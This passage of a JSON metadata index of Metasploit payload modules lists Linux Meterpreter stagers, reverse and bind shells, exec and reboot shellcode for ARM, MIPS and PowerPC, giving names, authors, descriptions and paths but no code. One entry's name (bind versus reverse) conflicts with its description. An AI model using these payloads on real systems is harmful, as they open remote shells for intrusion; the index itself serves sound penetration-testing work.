"Adam Cammack <adam_cammack@rapid7.com>",
"nemo <nemo@felinemenace.org>"
],
"description": "Inject the mettle server payload (staged). Listen for a connection",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/meterpreter/reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Stager",
"full_name": "payload/linux/armle/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"nemo <nemo@felinemenace.org>",
"tkmru"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/armle/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/armle/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/armle/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/shell/bind_tcp": {
"name": "Linux dup2 Command Shell, Bind TCP Stager",
"full_name": "payload/linux/armle/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>"
],
"description": "dup2 socket in r12, then execve. Listen for a connection",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/shell/reverse_tcp": {
"name": "Linux dup2 Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/armle/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>",
"tkmru"
],
"description": "dup2 socket in r12, then execve. Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/shell_bind_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/armle/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"civ",
"hal"
],
"description": "Connect to target and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-21 12:25:27 +0000",
"path": "/modules/payloads/singles/linux/armle/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/armle/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"civ"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-21 12:25:27 +0000",
"path": "/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mips64/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/mips64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mips64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/mips64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mips64/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/mips64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mips64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/mips64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mips64/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/mips64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mips64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mips64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/exec": {
"name": "Linux Execute Command",
"full_name": "payload/linux/mipsbe/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"entropy <entropy@phiral.net>"
],
"description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.",
"references": [
"EDB-17940"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/exec.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/meterpreter/reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Stager",
"full_name": "payload/linux/mipsbe/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"tkmru"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/mipsbe/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/mipsbe/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/mipsbe/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/reboot": {
"name": "Linux Reboot",
"full_name": "payload/linux/mipsbe/reboot",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"rigan - <imrigan@gmail.com>"
],
"description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.",
"references": [
"URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/reboot.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/reboot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/shell/reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/mipsbe/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"tkmru"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/mipsbe/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scut",
"vaicebine",
"Vlatko Kosturjak",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/mipsbe/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"rigan <imrigan@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
"EDB-18226"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/exec": {
"name": "Linux Execute Command",
"full_name": "payload/linux/mipsle/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"entropy <entropy@phiral.net>"
],
"description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.",
"references": [
"EDB-17940"
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsle/exec.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/meterpreter/reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Stager",
"full_name": "payload/linux/mipsle/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"tkmru"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/mipsle/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/mipsle/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/mipsle/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/reboot": {
"name": "Linux Reboot",
"full_name": "payload/linux/mipsle/reboot",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"rigan - <imrigan@gmail.com>"
],
"description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.",
"references": [
"URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php"
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsle/reboot.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/reboot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/shell/reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/mipsle/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"tkmru"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/mipsle/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scut",
"vaicebine",
"Vlatko Kosturjak",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/mipsle/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"rigan <imrigan@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/ppc/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/ppc/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/ppc/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/ppc/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/ppc/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/ppc/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "ppc, cbea",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/shell_find_port": {
"name": "Linux Command Shell, Find Port Inline",
"full_name": "payload/linux/ppc/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Linux",
"arch": "ppc, cbea",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc/shell_find_port.rb",
"is_install_path": true,
"ref_name": "linux/ppc/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/ppc/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "ppc, cbea",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/ppc64/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "ppc64, cbea64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc64/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64/shell_find_port": {
"name": "Linux Command Shell, Find Port Inline",
"full_name": "payload/linux/ppc64/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Linux",
"arch": "ppc64, cbea64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc64/shell_find_port.rb",
"is_install_path": true,
"ref_name": "linux/ppc64/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/ppc64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "ppc64, cbea64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64le/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/ppc64le/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc64le",
"rport": null,
